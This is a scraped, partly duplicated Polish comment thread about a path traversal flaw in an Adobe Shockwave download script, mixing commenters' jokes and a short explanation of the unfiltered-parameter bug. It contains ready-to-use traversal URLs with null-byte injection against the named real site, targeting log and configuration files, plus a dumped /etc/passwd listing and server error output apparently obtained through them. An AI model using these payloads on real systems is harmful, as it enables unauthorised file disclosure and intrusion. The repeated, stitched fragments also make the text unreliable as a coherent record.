Subroutine AUTOLOAD redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 84. Subroutine isaFilehandle redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 106. Subroutine isaFilename redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 115. Subroutine
O kurczę, toć to błąd, który popełnia człowiek UCZĄCY się dopiero PHP/Perla/jakiegokolwiek innego języka programowania. Kogo Adobe zatrudnia na stanowiska swoich webmasterów? Z chęcią zgłoszę się na rozmowę kwalifikacyjną na miejsce tego delikwenta ;).
Dla tych, którzy nie wiedzą do końca o co chodzi: Programista po pierwsze nie odfiltrował zawartości zmiennych pochodzących z adresu strony, po drugie wypisywał zawartość pliku wskazanego przez tą zmienną bezpośrednio do użytkownika, co jest chyba najgorszym błędem
kris2: to jasne, że nie ma uprawnień, inaczej po co by używać /etc/shadow ? Można by po staremu przechowywać hasła w /etc/passwd : tylko sobie żartowałem ;)
When you get the passwd you can get some other files too. When you get other files, the important files, you get the money. Then when you get the money, you get the power. Then when you get the power, then you get the women.
Opis zaiście powala, "jak zdobędziesz coś, to zdobędziesz coś więcej, jak zdobędziesz coś więcej, to będziesz mógł zdobyć jeszcze więcej, ....". Tak na prawdę, to passwd jest dostępne do odczytu dla każdego nie bez powodu.
Komentarze (20)
najlepsze
root:x:0:0:Super-User:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail Message Submission Program:/: listen:x:37:4:Network Admin:/usr/net/nls: gdm:x:50:50:GDM Reserved UID:/: webservd:x:80:80:WebServer Reserved UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/: patrol:x:9331:9331:Monitoring:/opt/patrol:/bin/ksh wwwtools:x:11274:11274:Web-Tech Admin:/home/wwwtools:/bin/csh wwwlogs:x:11275:11275:Log Admin:/home/wwwlogs:/usr/lib/rsh wwwdocs:x:60005:60030:Content:/home/wwwdocs:/usr/lib/rsh httpd:x:60004:60004:Apache:/home/httpd:/usr/lib/rsh svctag:x:60006:12::/tmp:/bin/pfsh
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//var/log/apache/errors.base%00
Subroutine AUTOLOAD redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 84. Subroutine isaFilehandle redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 106. Subroutine isaFilename redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 115. Subroutine
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//var/log/apache/errors.base%00
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/store.adobe.com.conf%00
http://reddit.com/info/2tpxi/comments
Dla tych, którzy nie wiedzą do końca o co chodzi: Programista po pierwsze nie odfiltrował zawartości zmiennych pochodzących z adresu strony, po drugie wypisywał zawartość pliku wskazanego przez tą zmienną bezpośrednio do użytkownika, co jest chyba najgorszym błędem
Say hello to my little friend.